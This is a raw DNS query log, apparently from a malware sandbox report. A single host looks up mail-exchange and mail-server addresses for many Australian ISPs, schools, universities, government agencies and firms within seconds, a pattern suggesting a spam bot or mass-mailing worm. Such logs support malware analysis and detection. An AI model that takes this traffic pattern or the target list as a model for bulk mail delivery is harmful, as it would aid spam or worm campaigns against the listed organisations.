                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.761555910 CET192.168.2.38.8.8.80xb821Standard query (0)mailsrv1.ccf.auth.grA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.781109095 CET192.168.2.38.8.8.80xd0d0Standard query (0)student.aum.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.893102884 CET192.168.2.38.8.8.80xe90aStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.913819075 CET192.168.2.38.8.8.80x5425Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:38.983987093 CET192.168.2.38.8.8.80x7aadStandard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.004266977 CET192.168.2.38.8.8.80xea46Standard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.093872070 CET192.168.2.38.8.8.80xd5c1Standard query (0)tempofoods.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.165338993 CET192.168.2.38.8.8.80x5adfStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.185611963 CET192.168.2.38.8.8.80xfafdStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.236900091 CET192.168.2.38.8.8.80xc1b5Standard query (0)yahoo.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.313313961 CET192.168.2.38.8.8.80x16e1Standard query (0)optushome.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.382160902 CET192.168.2.38.8.8.80x8a30Standard query (0)tempofoods-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.387676954 CET192.168.2.38.8.8.80x4bf3Standard query (0)dodo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.494105101 CET192.168.2.38.8.8.80xd33Standard query (0)paracombps.sa.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.561657906 CET192.168.2.38.8.8.80x5a5Standard query (0)thelakes.qld.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.564235926 CET192.168.2.38.8.8.80xad8cStandard query (0)paracombps-sa-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.626701117 CET192.168.2.38.8.8.80xa745Standard query (0)explosivestraining.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.653738976 CET192.168.2.38.8.8.80x6cfbStandard query (0)mail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.700877905 CET192.168.2.38.8.8.80x14c9Standard query (0)gtlaw.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.702661991 CET192.168.2.38.8.8.80x14faStandard query (0)mx-ctdodo.gtm.oss-core.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.752891064 CET192.168.2.38.8.8.80xb76eStandard query (0)au-smtp-inbound-1.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.780884027 CET192.168.2.38.8.8.80x65c2Standard query (0)bigpond.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.799833059 CET192.168.2.38.8.8.80x563Standard query (0)extmail.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.860131979 CET192.168.2.38.8.8.80x1ddeStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.879987001 CET192.168.2.38.8.8.80x6dc5Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.938705921 CET192.168.2.38.8.8.80x87ecStandard query (0)justice.vic.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.959048033 CET192.168.2.38.8.8.80x22d2Standard query (0)au-smtp-inbound-2.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.963135958 CET192.168.2.38.8.8.80xd5ebStandard query (0)mxa-001fc401.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:39.998791933 CET192.168.2.38.8.8.80x61bfStandard query (0)tased.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.080221891 CET192.168.2.38.8.8.80xf9efStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.100236893 CET192.168.2.38.8.8.80x97f6Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.181298018 CET192.168.2.38.8.8.80x944aStandard query (0)inchcape.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.204334021 CET192.168.2.38.8.8.80x11b0Standard query (0)mx07-00031601.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.258287907 CET192.168.2.38.8.8.80x62a5Standard query (0)iia.org.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.344471931 CET192.168.2.38.8.8.80xe57fStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.365979910 CET192.168.2.38.8.8.80x1062Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.457560062 CET192.168.2.38.8.8.80xc59aStandard query (0)netspace.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.476303101 CET192.168.2.38.8.8.80x5fadStandard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.488584042 CET192.168.2.38.8.8.80x4593Standard query (0)tased-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.548873901 CET192.168.2.38.8.8.80x2ee2Standard query (0)education.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.559612036 CET192.168.2.38.8.8.80x3e02Standard query (0)d324465.b.ess.de.barracudanetworks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.569593906 CET192.168.2.38.8.8.80x5329Standard query (0)alt3.aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.648089886 CET192.168.2.38.8.8.80xb627Standard query (0)carey.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.747818947 CET192.168.2.38.8.8.80xa273Standard query (0)carey-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.769691944 CET192.168.2.38.8.8.80x7b9dStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.828746080 CET192.168.2.38.8.8.80xb52bStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:40.842420101 CET192.168.2.38.8.8.80xd2e7Standard query (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.075370073 CET192.168.2.38.8.8.80xb4e6Standard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.075843096 CET192.168.2.38.8.8.80xa50Standard query (0)amnet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.076375961 CET192.168.2.38.8.8.80xa63aStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.099858999 CET192.168.2.38.8.8.80xbff5Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.166943073 CET192.168.2.38.8.8.80x8a0fStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.186223984 CET192.168.2.38.8.8.80xad8cStandard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.221750975 CET192.168.2.38.8.8.80xb5f0Standard query (0)bmcl.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.299845934 CET192.168.2.38.8.8.80x92e9Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.319634914 CET192.168.2.38.8.8.80x6438Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.390904903 CET192.168.2.38.8.8.80x46deStandard query (0)waverleyrsl.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.543147087 CET192.168.2.38.8.8.80x8a5cStandard query (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.544214010 CET192.168.2.38.8.8.80xdadeStandard query (0)mx1.amnet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.545171976 CET192.168.2.38.8.8.80xd5aaStandard query (0)filter2.waverl-5.mailguard.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.561475992 CET192.168.2.38.8.8.80x1847Standard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.641185999 CET192.168.2.38.8.8.80x97b6Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.662358999 CET192.168.2.38.8.8.80xc78cStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.706234932 CET192.168.2.38.8.8.80x512fStandard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.728704929 CET192.168.2.38.8.8.80xfd24Standard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.791378975 CET192.168.2.38.8.8.80x9fc4Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.811806917 CET192.168.2.38.8.8.80xa19fStandard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.878473997 CET192.168.2.38.8.8.80xc7edStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.905102015 CET192.168.2.38.8.8.80x3ba2Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:41.988070965 CET192.168.2.38.8.8.80xc12Standard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.012520075 CET192.168.2.38.8.8.80xe9e8Standard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.050779104 CET192.168.2.38.8.8.80x3aaeStandard query (0)aapt.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.121702909 CET192.168.2.38.8.8.80x6869Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.139928102 CET192.168.2.38.8.8.80x69acStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.262690067 CET192.168.2.38.8.8.80x62c6Standard query (0)westwindroofing.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.322314024 CET192.168.2.38.8.8.80x1eb7Standard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.348166943 CET192.168.2.38.8.8.80x727aStandard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.365793943 CET192.168.2.38.8.8.80xd57Standard query (0)asav.tpgtelecom.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.419766903 CET192.168.2.38.8.8.80x7fd2Standard query (0)student.uq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.487267971 CET192.168.2.38.8.8.80x269bStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.506019115 CET192.168.2.38.8.8.80x69b2Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.530136108 CET192.168.2.38.8.8.80xda17Standard query (0)student-uq-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.560894966 CET192.168.2.38.8.8.80x962dStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.579407930 CET192.168.2.38.8.8.80x3f94Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.674454927 CET192.168.2.38.8.8.80x4562Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.693645000 CET192.168.2.38.8.8.80xd6a6Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.778892994 CET192.168.2.38.8.8.80x85a6Standard query (0)netspace.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.861227989 CET192.168.2.38.8.8.80x2485Standard query (0)kilbreda.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.938230991 CET192.168.2.38.8.8.80x75dfStandard query (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.959120989 CET192.168.2.38.8.8.80x6a9bStandard query (0)mx.syd.iprimus.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:42.990021944 CET192.168.2.38.8.8.80x7393Standard query (0)au-smtp-inbound-1.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.048167944 CET192.168.2.38.8.8.80x9373Standard query (0)iimetro.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.099473953 CET192.168.2.38.8.8.80x6be1Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.106669903 CET192.168.2.38.8.8.80x5f60Standard query (0)anu.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.222131968 CET192.168.2.38.8.8.80x2dc0Standard query (0)kulcha.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.276376963 CET192.168.2.38.8.8.80x9496Standard query (0)mail.kulcha.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.281927109 CET192.168.2.38.8.8.80xb680Standard query (0)ci.austin.tx.usMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.390185118 CET192.168.2.38.8.8.80xd6cfStandard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.390892982 CET192.168.2.38.8.8.80x7a42Standard query (0)australianunity.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.413243055 CET192.168.2.38.8.8.80x9303Standard query (0)anu-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.444557905 CET192.168.2.38.8.8.80x6795Standard query (0)au-smtp-inbound-1.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.471769094 CET192.168.2.38.8.8.80x5374Standard query (0)education.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.549753904 CET192.168.2.38.8.8.80x6a64Standard query (0)ci-austin-tx-us.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.561223030 CET192.168.2.38.8.8.80x2eb9Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.588278055 CET192.168.2.38.8.8.80x98ceStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.657777071 CET192.168.2.38.8.8.80x2cf6Standard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.677032948 CET192.168.2.38.8.8.80xc619Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.735130072 CET192.168.2.38.8.8.80x9174Standard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.759207010 CET192.168.2.38.8.8.80xbafcStandard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.832065105 CET192.168.2.38.8.8.80xd01cStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.850658894 CET192.168.2.38.8.8.80x46eaStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.897139072 CET192.168.2.38.8.8.80x5289Standard query (0)mail1.employment.gov.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:43.927052975 CET192.168.2.38.8.8.80xf7d4Standard query (0)act.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.002892971 CET192.168.2.38.8.8.80x3108Standard query (0)nbnco.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.081126928 CET192.168.2.38.8.8.80x1a58Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.107285976 CET192.168.2.38.8.8.80x4c99Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.148447037 CET192.168.2.38.8.8.80x1377Standard query (0)smtp2a-1.nbnco.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.156105042 CET192.168.2.38.8.8.80x2bedStandard query (0)uq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.175365925 CET192.168.2.38.8.8.80x2a95Standard query (0)act-gov-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.254158974 CET192.168.2.38.8.8.80x9b8eStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.275847912 CET192.168.2.38.8.8.80xf5bfStandard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.314480066 CET192.168.2.38.8.8.80xb041Standard query (0)ozemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.335546970 CET192.168.2.38.8.8.80xa288Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.378578901 CET192.168.2.38.8.8.80x8f9cStandard query (0)midland.autotrader.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.463531971 CET192.168.2.38.8.8.80x2386Standard query (0)ihug.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.474729061 CET192.168.2.38.8.8.80x3dbStandard query (0)mx2.hc86-32.ap.iphmx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.560206890 CET192.168.2.38.8.8.80xe202Standard query (0)three.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.640753031 CET192.168.2.38.8.8.80x6f78Standard query (0)uts.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.673127890 CET192.168.2.38.8.8.80x7375Standard query (0)au-smtp-inbound-1.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.745207071 CET192.168.2.38.8.8.80xf558Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.763601065 CET192.168.2.38.8.8.80x1b4aStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.814868927 CET192.168.2.38.8.8.80x93fdStandard query (0)bekkers.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.851012945 CET192.168.2.38.8.8.80xd75fStandard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.872314930 CET192.168.2.38.8.8.80xd071Standard query (0)smtpin2.three.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.874815941 CET192.168.2.38.8.8.80x44a4Standard query (0)rainbowinn.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.975249052 CET192.168.2.38.8.8.80x5beaStandard query (0)amnet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.070960999 CET192.168.2.38.8.8.80x584fStandard query (0)education.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.096673012 CET192.168.2.38.8.8.80x12f0Standard query (0)alt3.aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.158061028 CET192.168.2.38.8.8.80xb8dfStandard query (0)northnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.201113939 CET192.168.2.38.8.8.80x6f0Standard query (0)d173919b.ess.barracudanetworks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.229270935 CET192.168.2.38.8.8.80x35Standard query (0)mx3.nameserver.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.252047062 CET192.168.2.38.8.8.80x5174Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.272802114 CET192.168.2.38.8.8.80xaeaStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.329883099 CET192.168.2.38.8.8.80x7f0dStandard query (0)mx1.amnet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.349088907 CET192.168.2.38.8.8.80xc1d8Standard query (0)isis.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.455965996 CET192.168.2.38.8.8.80x2792Standard query (0)newcastle.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.458698034 CET192.168.2.38.8.8.80xaf6bStandard query (0)au-smtp-inbound-2.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.530442953 CET192.168.2.38.8.8.80xf028Standard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.542568922 CET192.168.2.38.8.8.80xd388Standard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.548779964 CET192.168.2.38.8.8.80xd5f8Standard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.622930050 CET192.168.2.38.8.8.80xad26Standard query (0)ozemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.643668890 CET192.168.2.38.8.8.80x3c3Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.703512907 CET192.168.2.38.8.8.80xd730Standard query (0)bigblue.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.760255098 CET192.168.2.38.8.8.80xa24Standard query (0)au-smtp-inbound-1.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.817397118 CET192.168.2.38.8.8.80x6656Standard query (0)winen.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.873388052 CET192.168.2.38.8.8.80x3de4Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.889653921 CET192.168.2.38.8.8.80x529Standard query (0)alt1.aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.891091108 CET192.168.2.38.8.8.80x6b36Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.951934099 CET192.168.2.38.8.8.80xfb9aStandard query (0)dodo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.970524073 CET192.168.2.38.8.8.80x5e01Standard query (0)mx-ctdodo.gtm.oss-core.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.060905933 CET192.168.2.38.8.8.80x6d91Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.081144094 CET192.168.2.38.8.8.80xf9c7Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.126656055 CET192.168.2.38.8.8.80x905aStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.141834974 CET192.168.2.38.8.8.80x5decStandard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
